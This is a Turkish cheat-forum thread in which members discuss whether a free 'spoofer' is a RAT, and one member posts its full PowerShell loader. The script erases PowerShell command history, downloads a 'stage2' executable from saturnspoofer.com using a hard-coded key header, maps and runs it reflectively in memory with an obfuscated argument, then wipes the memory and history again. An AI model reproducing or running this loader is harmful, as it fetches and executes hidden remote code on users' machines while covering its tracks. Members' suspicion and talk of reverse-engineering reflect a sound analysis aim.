justaleakage
Gold Üye
- Katılım
- 24 Eyl 2025
- Mesajlar
- 301
- Beğeniler
- 63
.
Son düzenleme:
-
Reklam vermek için veya iletişim: [email protected] | Discord: cheatglobal.com -
.
- Konuyu Başlatan justaleakage
- Başlangıç tarihi
justaleakage
Gold Üye
- Katılım
- 24 Eyl 2025
- Mesajlar
- 301
- Beğeniler
- 63
İncelemedim ama sanmıyorum Premium bir ürün.
AliBey1661
Diamond Üye
- Katılım
- 23 Tem 2023
- Mesajlar
- 627
- Beğeniler
- 97
- İletişim
kanka bu zamanda kim kime beleşe temiz bir şey veriyor illaki bir şey var
KOLPAFANCY
Banned
- Katılım
- 29 Ağu 2021
- Mesajlar
- 910
- Beğeniler
- 227
Kod:
function Fail($Code, $Detail)
{
$Messages = @{
10 = "This must be run in 64-bit PowerShell"
11 = "Failed to download required files, check your connection and try again"
12 = "Failed to allocate memory"
13 = "Failed to load dependency: {0}"
}
$Text = if ($Messages.ContainsKey($Code)) { $Messages[$Code] -f $Detail } else { "An unknown error occurred" }
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show($Text, "Error", 'OK', 'Error') | Out-Null
exit 1
}
function CreateDelegateType([Type[]]$ParameterTypes,[Type]$ReturnType=[Void])
{
$domain=[AppDomain]::CurrentDomain
$name="DynamicDelegate_"+[Guid]::NewGuid().ToString("N")
$asm=New-Object System.Reflection.AssemblyName($name)
$ab=$domain.DefineDynamicAssembly($asm,[System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$mb=$ab.DefineDynamicModule("InMemory",(1 -eq 0))
$tb=$mb.DefineType("DelegateType","Class, Public, Sealed, AnsiClass, AutoClass",[MulticastDelegate])
$ctor=$tb.DefineConstructor("RTSpecialName, HideBySig, Public",[System.Reflection.CallingConventions]::Standard,$ParameterTypes)
$ctor.SetImplementationFlags("Runtime, Managed")
$invoke=$tb.DefineMethod("Invoke","Public, HideBySig, NewSlot, Virtual",$ReturnType,$ParameterTypes)
$invoke.SetImplementationFlags("Runtime, Managed")
return $tb.CreateType()
}
function GetExportAddress([IntPtr]$hModule,[string]$exportName)
{
$e_lfanew=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($hModule.ToInt64()+0x3C))
$peHeader=$hModule.ToInt64()+$e_lfanew
$exportRVA=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($peHeader+0x88))
if($exportRVA-eq 0){return [IntPtr]::Zero}
$exportDir=$hModule.ToInt64()+$exportRVA
$numNames=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($exportDir+0x18))
$addrOfNames=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($exportDir+0x20))
$addrOfFuncs=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($exportDir+0x1C))
$addrOfOrds=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($exportDir+0x24))
for ($i=0; $i -lt $numNames; $i++)
{
$nameRVA=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($hModule.ToInt64()+$addrOfNames+$i*4))
$funcName=""; $j=0
while ((1 -eq 1))
{
$c=[System.Runtime.InteropServices.Marshal]::ReadByte([IntPtr]($hModule.ToInt64()+$nameRVA+$j))
if($c-eq 0){break}
$funcName+=[char]$c; $j++
}
if ($funcName -eq $exportName)
{
$ordIndex=[System.Runtime.InteropServices.Marshal]::ReadInt16([IntPtr]($hModule.ToInt64()+$addrOfOrds+$i*2))
$funcRVA=[System.Runtime.InteropServices.Marshal]::ReadInt32([IntPtr]($hModule.ToInt64()+$addrOfFuncs+$ordIndex*4))
return [IntPtr]($hModule.ToInt64()+$funcRVA)
}
}
return [IntPtr]::Zero
}
function GetModuleBaseAddress([string]$ModuleName) {
foreach($m in (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Modules) {
if($m.ModuleName -ieq $ModuleName) { return $m.BaseAddress }
}
}
function ReadU16([byte[]]$data,[int]$offset){ return [BitConverter]::ToUInt16($data,$offset) }
function ReadU32([byte[]]$data,[int]$offset){ return [BitConverter]::ToUInt32($data,$offset) }
function ReadU64([byte[]]$data,[int]$offset){ return [BitConverter]::ToUInt64($data,$offset) }
function ReadAscii([byte[]]$data,[int]$offset,[int]$len){ return ([System.Text.Encoding]::ASCII.GetString($data,$offset,$len)).Trim([char]0) }
function RvaToRfa([UInt32]$rva,[byte[]]$peBytes,[int]$e_lfanew,[UInt16]$numSections,[UInt16]$sizeOfOptionalHeader)
{
$sectionOffset=$e_lfanew+24+$sizeOfOptionalHeader
$sectionSize=40
for ($i=0; $i -lt $numSections; $i++)
{
$entry = $sectionOffset + ($i*$sectionSize)
$virtAddr = ReadU32 $peBytes ($entry+12)
$rawSize = ReadU32 $peBytes ($entry+16)
$rawPtr = ReadU32 $peBytes ($entry+20)
if (($rva -ge $virtAddr) -and ($rva -lt ($virtAddr+$rawSize)))
{
return $rawPtr + ($rva - $virtAddr)
}
}
return $rva
}
if ([IntPtr]::Size -eq 4)
{
Fail 10
}
if (Get-Module -Name PSReadline -ErrorAction SilentlyContinue)
{
$historyPath = (Get-PSReadlineOption -ErrorAction SilentlyContinue).HistorySavePath
if ($historyPath)
{
Remove-Item -Path $historyPath -Force -ErrorAction SilentlyContinue
}
}
Remove-Item -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
Clear-History
$CdnBase = "https://saturnspoofer.com"
try {
$CdnResponse = (Invoke-WebRequest -Uri "https://saturnspoofer.com/cdn-config" -UseBasicParsing -UserAgent "SaturnAgent" -TimeoutSec 5).Content | ConvertFrom-Json
if ($CdnResponse.cdn) { $CdnBase = $CdnResponse.cdn }
} catch {}
$ModuleBytes = $null
$MaxRetries = 7
for ($Attempt = 1; $Attempt -le $MaxRetries; $Attempt++)
{
try
{
$ModuleBytes = (Invoke-WebRequest -Uri "$CdnBase/stage2" -UseBasicParsing -UserAgent "SaturnAgent" -Headers @{"X-Stage2-Key"="9f3a7c2e1b5d8042"}).Content
if ($ModuleBytes -and $ModuleBytes.Length -gt 1024)
{
if ($ModuleBytes[0] -eq 0x4D -and $ModuleBytes[1] -eq 0x5A)
{
$PeOffset = ReadU32 $ModuleBytes 0x3C
if (($PeOffset + 4) -lt $ModuleBytes.Length -and
$ModuleBytes[$PeOffset] -eq 0x50 -and $ModuleBytes[$PeOffset+1] -eq 0x45)
{
break
}
}
}
$ModuleBytes = $null
} catch {}
if ($Attempt -lt $MaxRetries) { Start-Sleep -Seconds 3 }
}
if (-not $ModuleBytes -or $ModuleBytes.Length -eq 0)
{
Fail 11
}
$NtdllBase = GetModuleBaseAddress "ntdll.dll"
$KernelBase = GetModuleBaseAddress "kernelbase.dll"
$pVirtualAlloc = GetExportAddress $KernelBase "VirtualAlloc"
$pVirtualFree = GetExportAddress $KernelBase "VirtualFree"
$pVirtualProtect = GetExportAddress $KernelBase "VirtualProtect"
$pLoadLibraryA = GetExportAddress $KernelBase "LoadLibraryA"
$pGetProcAddress = GetExportAddress $KernelBase "GetProcAddress"
$pmemcpy = GetExportAddress $NtdllBase "memcpy"
$pmemset = GetExportAddress $NtdllBase "memset"
$VirtualAllocDelegate = CreateDelegateType @([IntPtr],[UInt32],[UInt32],[UInt32])([IntPtr])
$VirtualFreeDelegate = CreateDelegateType @([IntPtr],[IntPtr],[UInt32])([Void])
$VirtualProtectDelegate = CreateDelegateType @([IntPtr],[IntPtr],[UInt32],[UInt32].MakeByRefType())([Void])
$memcpyDelegate = CreateDelegateType @([IntPtr],[IntPtr],[UInt32])([Void])
$memsetDelegate = CreateDelegateType @([IntPtr],[UInt32],[UInt32])([Void])
$LoadLibraryADelegate = CreateDelegateType @([string])([IntPtr])
$GetProcAddrDelegate = CreateDelegateType @([IntPtr],[string])([IntPtr])
$GetProcAddrIntDelegate = CreateDelegateType @([IntPtr],[IntPtr])([IntPtr])
$VirtualAlloc=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pVirtualAlloc,$VirtualAllocDelegate)
$VirtualFree=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pVirtualFree,$VirtualFreeDelegate)
$VirtualProtect=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pVirtualProtect,$VirtualProtectDelegate)
$memcpy=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pmemcpy,$memcpyDelegate)
$memset=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pmemset,$memsetDelegate)
$LoadLibraryA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pLoadLibraryA,$LoadLibraryADelegate)
$GetProcAddr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGetProcAddress,$GetProcAddrDelegate)
$GetProcAddrInt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pGetProcAddress,$GetProcAddrIntDelegate)
$e_lfanew = ReadU32 $ModuleBytes 0x3C
$numSections = ReadU16 $ModuleBytes ($e_lfanew+6)
$sizeOfOptionalHeader = ReadU16 $ModuleBytes ($e_lfanew+20)
$optHeader = $e_lfanew+24
$imageBase = ReadU64 $ModuleBytes ($optHeader+24)
$entryPointRVA = ReadU32 $ModuleBytes ($optHeader+16)
$sizeOfImage = ReadU32 $ModuleBytes ($optHeader+56)
$sizeOfHeaders = ReadU32 $ModuleBytes ($optHeader+60)
$sectionOffset = $e_lfanew+24+$sizeOfOptionalHeader
$ImgGcHandle = [Runtime.InteropServices.GCHandle]::Alloc($ModuleBytes,'Pinned')
$MappedBaseAddr = $VirtualAlloc.Invoke([IntPtr]::Zero, $sizeOfImage, 0x3000, 0x40)
$UnmappedBaseAddr = $ImgGcHandle.AddrOfPinnedObject()
if ($MappedBaseAddr -eq [IntPtr]::Zero)
{
$ImgGcHandle.Free()
Fail 12
}
$memcpy.Invoke($MappedBaseAddr,$UnmappedBaseAddr,$sizeOfHeaders)
for ($i=0; $i -lt $numSections; $i++)
{
$entry = $sectionOffset + ($i*40)
$virtAddr = ReadU32 $ModuleBytes ($entry+12)
$rawSize = ReadU32 $ModuleBytes ($entry+16)
$rawPtr = ReadU32 $ModuleBytes ($entry+20)
if ($rawSize -gt 0)
{
$dest=[IntPtr]($MappedBaseAddr.ToInt64()+$virtAddr)
$src=[IntPtr]($UnmappedBaseAddr.ToInt64()+$rawPtr)
$memcpy.Invoke($dest,$src,$rawSize)
}
}
$delta=$MappedBaseAddr.ToInt64()-[Int64]$imageBase
if($delta -ne 0)
{
$relocDirRVA=ReadU32 $ModuleBytes ($optHeader+112+(5*8))
$relocDirSize=ReadU32 $ModuleBytes ($optHeader+112+(5*8)+4)
$relocPos=RvaToRfa $relocDirRVA $ModuleBytes $e_lfanew $numSections $sizeOfOptionalHeader
$endReloc=$relocPos+$relocDirSize
while($relocPos -lt $endReloc)
{
$pageRVA=ReadU32 $ModuleBytes $relocPos
$blockSize=ReadU32 $ModuleBytes ($relocPos+4)
if($blockSize -eq 0){break}
$entryCount=($blockSize-8)/2
$entryBase=$relocPos+8
for($ri=0;$ri -lt $entryCount;$ri++){
$entry=ReadU16 $ModuleBytes ($entryBase+($ri*2))
$type=$entry -shr 12; $offset=$entry -band 0x0FFF
if($type -eq 10)
{
$patchAddr=[IntPtr]($MappedBaseAddr.ToInt64()+$pageRVA+$offset)
$orig=[Runtime.InteropServices.Marshal]::ReadInt64($patchAddr)
$new=$orig+$delta
[Runtime.InteropServices.Marshal]::WriteInt64($patchAddr,$new)
}
}
$relocPos+=$blockSize
}
}
$importDirRVA = ReadU32 $ModuleBytes ($optHeader + 112 + (1*8))
$importDirSize = ReadU32 $ModuleBytes ($optHeader + 112 + (1*8) + 4)
if ($importDirRVA -ne 0)
{
$impPos = RvaToRfa $importDirRVA $ModuleBytes $e_lfanew $numSections $sizeOfOptionalHeader
$impDescSize = 20
while ((1 -eq 1))
{
$origFirstThunk = ReadU32 $ModuleBytes $impPos
$nameRVA = ReadU32 $ModuleBytes ($impPos + 12)
$firstThunkRVA = ReadU32 $ModuleBytes ($impPos + 16)
if (($origFirstThunk -eq 0) -and ($nameRVA -eq 0) -and ($firstThunkRVA -eq 0))
{
break
}
$j = 0
$dllName = ""
$nameOff = RvaToRfa $nameRVA $ModuleBytes $e_lfanew $numSections $sizeOfOptionalHeader
while ($ModuleBytes[$nameOff + $j] -ne 0)
{
$dllName += [char]$ModuleBytes[$nameOff + $j]
$j++
}
$hMod = $LoadLibraryA.Invoke($dllName)
if ($hMod -eq [IntPtr]::Zero)
{
Fail 13 $dllName
}
$oftRVA = if ($origFirstThunk -ne 0) { $origFirstThunk } else { $firstThunkRVA }
$oftOff = RvaToRfa $oftRVA $ModuleBytes $e_lfanew $numSections $sizeOfOptionalHeader
$thunkIndex = 0
while ((1 -eq 1))
{
$thunkData = ReadU64 $ModuleBytes ($oftOff + ($thunkIndex * 8))
if ($thunkData -eq 0) { break }
$funcAddr = [IntPtr]::Zero
if (($thunkData -band 0x8000000000000000) -ne 0)
{
$ordinal16 = [UInt16]($thunkData -band 0xFFFF)
$ordPtr = [IntPtr]([UInt32]$ordinal16)
$funcAddr = $GetProcAddrInt.Invoke($hMod, $ordPtr)
}
else
{
$hintNameRVA = [int]$thunkData
$hintNameOff = RvaToRfa $hintNameRVA $ModuleBytes $e_lfanew $numSections $sizeOfOptionalHeader
$jj = 2
$funcName = ""
while ($ModuleBytes[$hintNameOff + $jj] -ne 0)
{
$funcName += [char]$ModuleBytes[$hintNameOff + $jj]
$jj++
}
$funcAddr = $GetProcAddr.Invoke($hMod, $funcName)
}
if ($funcAddr -ne [IntPtr]::Zero)
{
$writeAddr = [IntPtr]($MappedBaseAddr.ToInt64() + $firstThunkRVA + ($thunkIndex * 8))
[System.Runtime.InteropServices.Marshal]::WriteInt64($writeAddr, $funcAddr.ToInt64())
}
$thunkIndex++
}
$impPos += $impDescSize
}
}
$ImgGcHandle.Free()
$entryAddr = [IntPtr]($MappedBaseAddr.ToInt64()+$entryPointRVA)
$DllMainDel = CreateDelegateType @([IntPtr],[UInt32],[IntPtr])([Void])
$DllMain = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($entryAddr, $DllMainDel)
$DllMain.Invoke($MappedBaseAddr, 1, ((([Int64](0x94D19070 -bxor 0xDEADBEEF)) -shl 32) -bor ([Int64](0xD1A33AFC -bxor 0xCAFEBABE))))
for ($i=0; $i -lt $sizeOfImage; $i+=0x1000)
{
$old = 0
$VirtualProtect.Invoke([IntPtr]($MappedBaseAddr.ToInt64() + $i), [IntPtr]0x1000, 4, [ref]$old)
$memset.Invoke([IntPtr]($MappedBaseAddr.ToInt64() + $i), 0, 0x1000)
}
$VirtualFree.Invoke($MappedBaseAddr, 0, 0x8000)
if (Get-Module -Name PSReadline -ErrorAction SilentlyContinue)
{
$historyPath = (Get-PSReadlineOption -ErrorAction SilentlyContinue).HistorySavePath
if ($historyPath)
{
Remove-Item -Path $historyPath -Force -ErrorAction SilentlyContinue
}
}
Remove-Item -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Force -ErrorAction SilentlyContinue
Clear-History
exitphysicaldrive0
Platinum Üye
- Katılım
- 3 Ocak 2026
- Mesajlar
- 184
- Beğeniler
- 54
Rat olduğu gerçeğini değiştirmiyor bence sil ban yiyeceksin
MertcanBahar
Platinum Üye
- Katılım
- 25 Ağu 2025
- Mesajlar
- 193
- Beğeniler
- 72
- İletişim
crackme ne demek biliyor musun peki
justaleakage
Gold Üye
- Katılım
- 24 Eyl 2025
- Mesajlar
- 301
- Beğeniler
- 63
Olum siz ne yaşıyorsunuz ben paylaşmadım ürünü. Reverse engineeringle ilgilenen arkadaşlar incelesin rat mı değil mi onlar söyler zaten
physicaldrive0
Platinum Üye
- Katılım
- 3 Ocak 2026
- Mesajlar
- 184
- Beğeniler
- 54
Olum anlamıyorsun galiba kullanıcı paylaştığı dosyadan sorumludur sence reverser adam bunu pcsinde açmıyormu virüs analiz konuları dışında paylaştığın şey virüslü ise ban yersin basit
buney